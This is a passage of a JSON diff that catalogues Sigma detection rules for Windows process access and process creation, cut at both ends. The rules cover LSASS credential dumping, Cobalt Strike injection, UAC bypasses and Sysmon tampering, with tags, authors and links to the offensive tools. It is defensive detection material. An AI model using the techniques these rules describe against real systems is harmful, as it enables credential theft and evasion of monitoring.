"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2022/03/11", + "filename": "process_access_win_shellcode_inject_msf_empire.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "value": "Suspicious LSASS Access Via MalSecLogon", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/06/29", + "filename": "process_access_win_susp_seclogon.yml", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "value": "CMSTP Execution Process Access", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" + ], + "creation_date": "2018/07/16", + "filename": "proc_access_win_cmstp_execution_by_access.yml", + "author": "Nik Seetharaman", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", + "value": "CobaltStrike BOF Injection Pattern", + "meta": { + "refs": [ + "https://github.com/boku7/injectAmsiBypass", + "https://github.com/boku7/spawn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "value": "Credential Dumping Tools Accessing LSASS Memory", + "meta": { + "refs": [ + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" + ], + "creation_date": "2017/02/16", + "filename": "proc_access_win_cred_dump_lsass_access.yml", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; please add more filters" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess", + "meta": { + "refs": [ + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/07/28", + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", + "author": "Christian Burkard, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage", + "meta": { + "refs": [ + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "proc_access_win_hack_sysmonente.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS Handle", + "meta": { + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" + ], + "creation_date": "2022/06/27", + "filename": "proc_access_win_handlekatz_lsass_access.yml", + "author": "Bhabesh Raj (rule), @thefLinkk", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess", + "meta": { + "refs": [ + "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2020/01/02", + "filename": "proc_access_win_invoke_phantom.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne", + "meta": { + "refs": [ + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" + ], + "creation_date": "2020/09/09", + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection", + "meta": { + "refs": [ + "https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" + ], + "creation_date": "2021/08/09", + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface", + "meta": { + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/07", + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL", + "meta": { + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/20", + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2019/04/03", + "filename": "proc_access_win_lsass_memdump.yml", + "author": "Samir Bousseaden, Michael Haag", + "level": "high", + "falsepositive": [ + "False positives are present when looking for 0x1410. Exclusions may be required." + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/02/10", + "filename": "proc_access_win_lsass_memdump_evasion.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, since these tools shouldn't access lsass.exe at all" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/02/10", + "filename": "proc_access_win_lsass_memdump_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rare programs that contain the word dump in their name and access lsass" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS", + "meta": { + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2012/06/27", + "filename": "proc_access_win_lsass_werfault.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2017/03/04", + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "author": "John Lambert (tech), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management", + "meta": { + "refs": [ + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ], + "creation_date": "2019/05/20", + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "author": "Patryk Prauze - ING Tech", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz", + "meta": { + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/08/03", + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on LSASS Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/03/13", + "filename": "proc_access_win_rare_proc_access_lsass.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags", + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2021/11/22", + "filename": "proc_access_win_susp_proc_access_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2021/11/27", + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" + ], + "tags": [ + "attack.t1548" + ], + "creation_date": "2021/04/30", + "filename": "proc_access_win_svchost_cred_dump.yml", + "author": "Florent Labouyrie", + "level": "high", + "falsepositive": [ + "Non identified legit exectubale" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess", + "meta": { + "refs": [ + "https://github.com/kagancapar/CVE-2022-29072", + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ], + "creation_date": "2022/04/17", + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of unusual child processes by different system processes", + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2020/10/28", + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "author": "Semanur Guneysu @semanurtg, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", + "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", + "value": "Abusing Windows Telemetry For Persistence", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ], + "creation_date": "2020/09/29", + "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ], + "creation_date": "2020/05/12", + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced Port Scanner.", + "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_advanced_port_scanner.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "value": "Execute From Alternate Data Streams", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/09/01", + "filename": "proc_creation_win_alternate_data_streams.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/13", + "filename": 